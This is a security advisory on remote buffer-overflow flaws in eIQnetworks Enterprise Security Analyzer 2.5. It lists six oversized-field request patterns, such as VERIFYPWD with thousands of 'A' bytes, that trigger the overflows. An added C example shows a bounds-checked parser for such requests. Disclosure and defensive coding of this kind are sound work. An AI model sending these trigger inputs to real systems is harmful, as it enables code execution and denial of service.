source: https://www.securityfocus.com/bid/23454/info
eIQnetworks Enterprise Security Analyzer is prone to multiple buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
Exploiting these issues allows remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Enterprise Security Analyzer 2.5 is reported vulnerable; other versions may also be affected.
- DELETESEARCHFOLDER : [DELETESEARCHFOLDER&A x 40000...&]
- DELTASK: [DELTASK&A x 3000...&current&test&]
- HMGR_CHECKHOSTSCSV: [ HMGR_CHECKHOSTSCSV&A x 80000...&]
- TASKUPDATEDUSER: [TASKUPDATEDUSER&A x 60000...&test&test&]
- VERIFYUSERKEY: [VERIFYUSERKEY&A x 13000...&Administrator&127.0.0.1&12345]
- VERIFYPWD: [VERIFYPWD&A x 6000...&admin&adminpass&]
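
The missing bounds check described above, shown in its corrected form as an added example (not code from the advisory or from the vendor): a parser for '&'-delimited requests of the shape listed here that checks each field's length before copying it into a fixed-size buffer. `FIELD_MAX`, `MAX_FIELDS`, `struct request` and `parse_request` are hypothetical names and limits chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX  256   /* assumed per-field limit, not the product's real size */
#define MAX_FIELDS 8     /* assumed upper bound on fields per request */

struct request {
    size_t count;
    char   field[MAX_FIELDS][FIELD_MAX];
};

/* Split msg[0..len) on '&' into fixed-size buffers.
 * Returns 0 on success, -1 if a field would not fit or there are too many. */
int parse_request(const char *msg, size_t len, struct request *out)
{
    size_t start = 0;
    out->count = 0;
    for (size_t i = 0; i <= len; i++) {
        if (i < len && msg[i] != '&')
            continue;
        size_t flen = i - start;
        if (i == len && flen == 0)
            break;                      /* trailing '&' ends the request */
        if (flen >= FIELD_MAX || out->count == MAX_FIELDS)
            return -1;                  /* reject before any copy takes place */
        memcpy(out->field[out->count], msg + start, flen);
        out->field[out->count][flen] = '\0';
        out->count++;
        start = i + 1;
    }
    return out->count ? 0 : -1;
}

int main(void)
{
    /* Constructed inputs: one well-formed request, one with a 6000-byte field. */
    const char ok[] = "VERIFYPWD&user1&admin&adminpass&";
    char big[6100] = "VERIFYPWD&";
    memset(big + 10, 'A', 6000);
    strcpy(big + 6010, "&admin&adminpass&");

    struct request r;
    printf("normal:   %d\n", parse_request(ok, strlen(ok), &r));
    printf("oversize: %d\n", parse_request(big, strlen(big), &r));
    return 0;
}
```

The length test runs before `memcpy`, so an oversized field is rejected without ever touching the destination buffer.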